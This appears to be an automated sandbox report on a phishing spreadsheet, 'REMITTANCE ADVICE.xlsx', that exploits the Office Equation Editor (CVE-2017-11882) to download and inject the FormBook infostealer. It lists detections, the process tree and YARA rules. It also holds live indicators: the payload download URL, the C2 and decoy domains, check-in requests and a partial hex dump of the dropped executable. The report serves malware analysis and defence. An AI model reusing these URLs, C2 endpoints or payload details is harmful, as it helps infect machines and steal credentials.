
Windows Analysis Report REMITTANCE ADVICE.xlsx

Overview

General Information

Sample Name: REMITTANCE ADVICE.xlsx
Analysis ID: 528736
MD5: 2caab2292b282e6a5dea1cf78f84924a
SHA1: 86f37c31091b15cca135490a84eb52027bb1a4df
SHA256: 4c84124c87cd46ce58a7a8208ad1674c4a270793f9a6158e80fd28f96b3cc844
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 284 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1184 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1348 cmdline: "C:\Users\Public\vbc.exe" MD5: 1624595E2354FF7BE9E7DC6DEF2ED69E)
      • vbc.exe (PID: 2028 cmdline: "C:\Users\Public\vbc.exe" MD5: 1624595E2354FF7BE9E7DC6DEF2ED69E)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • explorer.exe (PID: 2992 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
            • cmd.exe (PID: 1228 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.ff4cu6twc.xyz/m07f/"], "decoy": ["khitthit.club", "kczu.net", "caylalamar.com", "iixiazai.com", "nickatwoodrealestate.com", "006664.com", "strimsbdltd.com", "mykyhouse.com", "flyestkicks.com", "campingwithoutcanvas.com", "sarishamisen.com", "retrorecycling.com", "zw4azsjb3cuj.biz", "lokasennaservices.com", "charleswagner.xyz", "smmbazar.net", "rebornmkt.com", "clicktoreach.com", "alendigital.xyz", "carehrc.com", "locationdevice.online", "homevoru.com", "electrahealth.clinic", "punto-linea-espacio.com", "yhxt13800.com", "pancakeshares.com", "artdecooutdoor.com", "phg-formation.com", "businessagilitysessions.com", "procofun.com", "thekatz.group", "casepoo.com", "tokofebri.store", "crippledom.com", "online-shrine-ltd.com", "jesbon.com", "ligoom.com", "odonofally.quest", "tender.guru", "payments-gate-325r.xyz", "bfcmtld.com", "scoocs.info", "welderstexas.com", "eastendfinances.com", "bohoglamburlesque.com", "naijafame.net", "digitallghtning.com", "refreshpor.xyz", "luly-boo.com", "enchantedroses-shop.com", "victorrialand.com", "kenzivenum.com", "protokolavukatlik.com", "berrymojito.com", "empireexteriorservices.com", "pushaoeel-kouhu-bunan7266.com", "travellerbugs.com", "allcources.com", "jaszicurls.com", "rem-youth.com", "strawberryroom-15.com", "paramusinsurancebroker.com", "jhtz001.com", "promtgloan.com"]}

Yara Overview

Memory Dumps

Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bec:$sqlite3step: 68 34 1C 7B E1
  • 0x16b08:$sqlite3text: 68 38 2A 90 C5
  • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source: 4.2.vbc.exe.510000.1.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 4.2.vbc.exe.510000.1.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 4.2.vbc.exe.510000.1.raw.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bec:$sqlite3step: 68 34 1C 7B E1
  • 0x16b08:$sqlite3text: 68 38 2A 90 C5
  • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
Source: 5.2.vbc.exe.400000.0.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 5.2.vbc.exe.400000.0.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 192.210.173.90, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1184, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1184, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1184, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 1348
Sigma detected: Execution from Suspicious Folder
Source: Process started | Author: Florian Roth | Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1184, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 1348

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.ff4cu6twc.xyz/m07f/"], "decoy": ["khitthit.club", "kczu.net", "caylalamar.com", "iixiazai.com", "nickatwoodrealestate.com", "006664.com", "strimsbdltd.com", "mykyhouse.com", "flyestkicks.com", "campingwithoutcanvas.com", "sarishamisen.com", "retrorecycling.com", "zw4azsjb3cuj.biz", "lokasennaservices.com", "charleswagner.xyz", "smmbazar.net", "rebornmkt.com", "clicktoreach.com", "alendigital.xyz", "carehrc.com", "locationdevice.online", "homevoru.com", "electrahealth.clinic", "punto-linea-espacio.com", "yhxt13800.com", "pancakeshares.com", "artdecooutdoor.com", "phg-formation.com", "businessagilitysessions.com", "procofun.com", "thekatz.group", "casepoo.com", "tokofebri.store", "crippledom.com", "online-shrine-ltd.com", "jesbon.com", "ligoom.com", "odonofally.quest", "tender.guru", "payments-gate-325r.xyz", "bfcmtld.com", "scoocs.info", "welderstexas.com", "eastendfinances.com", "bohoglamburlesque.com", "naijafame.net", "digitallghtning.com", "refreshpor.xyz", "luly-boo.com", "enchantedroses-shop.com", "victorrialand.com", "kenzivenum.com", "protokolavukatlik.com", "berrymojito.com", "empireexteriorservices.com", "pushaoeel-kouhu-bunan7266.com", "travellerbugs.com", "allcources.com", "jaszicurls.com", "rem-youth.com", "strawberryroom-15.com", "paramusinsurancebroker.com", "jhtz001.com", "promtgloan.com"]}
Multi AV Scanner detection for submitted file
Source: REMITTANCE ADVICE.xlsx | Virustotal: Detection: 35%
Source: REMITTANCE ADVICE.xlsx | ReversingLabs: Detection: 43%
Yara detected FormBook
Source: Yara match | File source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://192.210.173.90/70007/vbc.exe | Avira URL Cloud: Label: malware
Source: www.ff4cu6twc.xyz/m07f/ | Avira URL Cloud: Label: phishing
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Temp\nsvE542.tmp\otav.dll | ReversingLabs: Detection: 40%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsvE542.tmp\otav.dll | Joe Sandbox ML: detected
Source: 7.2.explorer.exe.2ca796c.7.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.vbc.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.vbc.exe.510000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.0.unpack | Avira: Label: TR/Patched.Ren.Gen2
Source: 5.0.vbc.exe.400000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.explorer.exe.41b680.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.vbc.exe.400000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.1.vbc.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.526224259.00000000008A0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.464564394.0000000000430000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.465728410.0000000000590000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.525516222.0000000000720000.00000040.00000001.sdmp, explorer.exe, explorer.exe, 00000007.00000002.670738213.0000000002920000.00000040.00000001.sdmp
Source: Binary string: explorer.pdb source: vbc.exe, 00000005.00000002.527175937.0000000002980000.00000040.00020000.sdmp, vbc.exe, 00000005.00000003.523078790.00000000023C0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.523696493.00000000026A0000.00000004.00000001.sdmp
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405C22 FindFirstFileA,FindClose,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00402630 FindFirstFileA,
Source: global traffic | DNS query: name: www.promtgloan.com
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop ebx
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop edi
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop edi
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 4x nop then pop ebx
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.210.173.90:80
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.210.173.90:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 156.234.44.48:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 156.234.44.48:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 156.234.44.48:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.yhxt13800.com
Source: C:\Windows\explorer.exe | Network Connect: 154.205.233.189 80
Source: C:\Windows\explorer.exe | Network Connect: 156.234.44.48 80
Source: C:\Windows\explorer.exe | Domain query: www.ff4cu6twc.xyz
Source: C:\Windows\explorer.exe | Network Connect: 23.225.139.107 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Domain query: www.promtgloan.com
Source: C:\Windows\explorer.exe | Domain query: www.clicktoreach.com
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe | DNS query: www.ff4cu6twc.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.ff4cu6twc.xyz/m07f/
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View | ASN Name: IKGUL-26484US IKGUL-26484US
Source: global traffic | HTTP traffic detected: GET /m07f/?8p=5jRPexjhYVA&8pM=fckM7dU8XdB/CBRKAli8IWZTeVSsZcSnfT9NsehECm7QI2Avboj8F2o4ZiYCfg8g2yKAcw== HTTP/1.1 | Host: www.promtgloan.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /m07f/?8pM=dna2QeGax28GSJkNz7Uka6j7mpWTPT6ewM6loPSgIzIWFgZfz42ON2JlykoAty+SKeMdPQ==&8p=5jRPexjhYVA HTTP/1.1 | Host: www.yhxt13800.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /m07f/?8p=5jRPexjhYVA&8pM=igd9ZaB/0LuNZ3khfd1rv5ythTuTDfiv5fbgroetehOkX6jie/kGfA2Y9msKDFCRQxq0nA== HTTP/1.1 | Host: www.clicktoreach.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 23.225.139.107 23.225.139.107
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 17:12:13 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12Last-Modified: Wed, 24 Nov 2021 09:28:50 GMTETag: "4a7bd-5d1857c59b117"Accept-Ranges: bytesContent-Length: 305085Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cd cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 84 02 00 00 04 00 00 e3 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 03 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 74 00 00 b4 00 00 00 00 70 03 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 5b 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c 12 00 00 00 70 00 00 00 14 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 
00 00 58 5c 02 00 00 90 00 00 00 04 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 70 03 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic | HTTP traffic detected: GET /70007/vbc.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 192.210.173.90 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 25 Nov 2021 17:13:29 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "6192576c-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 